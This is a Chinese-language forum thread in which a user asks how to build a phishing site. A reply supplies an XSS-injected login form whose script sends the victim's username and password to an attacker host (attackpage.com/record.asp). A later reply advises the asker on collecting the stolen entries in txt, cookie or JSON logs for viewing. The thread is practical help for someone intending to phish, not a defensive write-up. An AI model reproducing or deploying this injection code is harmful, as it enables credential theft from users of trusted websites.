如何制作钓鱼网址?

有没有大哥会制作钓鱼网站?

所谓钓鱼攻击就是构建一个钓鱼页面，诱骗受害者在其中输入一些敏感信息，然后将其发送给攻击者。利用XSS的注入脚本，我们也可以很方便地注入钓鱼页面的代码，从而引导钓鱼攻击。比如下面这样一段代码：

1.          <script>
   
2. function hack()
   
3. {
   
4.                    location.replace(“[url]http://www.attackpage.com/record.asp?username=“[/url]
   
5. +document.forms[0].user.value + “password=” + document.forms[0].pass.value);
   
6. }
   
7. </script>
   
8. <form>
   
9. <br><br><HR><H3>这个功能需要登录:</H3 >
   
10. <br><br>请输入用户名：<br>
    
11. <input type=”text” id=”user”name=”user”>
    
12. <br>请输入密码：<br>
    
13. <input type=”password” name =“pass”>
    
14. <br><input type=”submit”name=”login” value=”登录”onclick=”hack()”>
    
15. </form><br><br><HR>

复制代码

注入上面的代码后，则会在原来的页面上，插入一段表单，要求用户输入自己的用户名和密码，而当用户点击“登录”按钮后，则会执行hack()函数，将用户的输入发送到攻击者指定的网站上去。这样，攻击者就成功窃取了该用户的账号信息。可以看到，和一般的钓鱼攻击不同，XSS引导的钓鱼攻击由于是对用户信任的网站页面进行修改，因此隐蔽性很高，而用户的账号失窃往往会带来重大的损失，因此它的危害也是十分巨大的。



<input type=”text” id=”user”name=”user”>
<input type=”password” name =“pass”>
注意这两个name,将user,pass的内容传给了前面的user.value,pass.value用来登录。

狼毛 发表于 2023-1-25 11:43
所谓钓鱼攻击就是构建一个钓鱼页面，诱骗受害者在其中输入一些敏感信息，然后将其发送给攻击者。利用XSS的 ...

哥，我想问一下 这个有后台吗? 就是别人输入的信息后台能看到吗？

13054003861 发表于 2023-1-25 14:36
哥，我想问一下 这个有后台吗? 就是别人输入的信息后台能看到吗？

/record.asp就是，你可以将他改进一下，记录在txt,cookie里，甚至在json里。然后导出以看。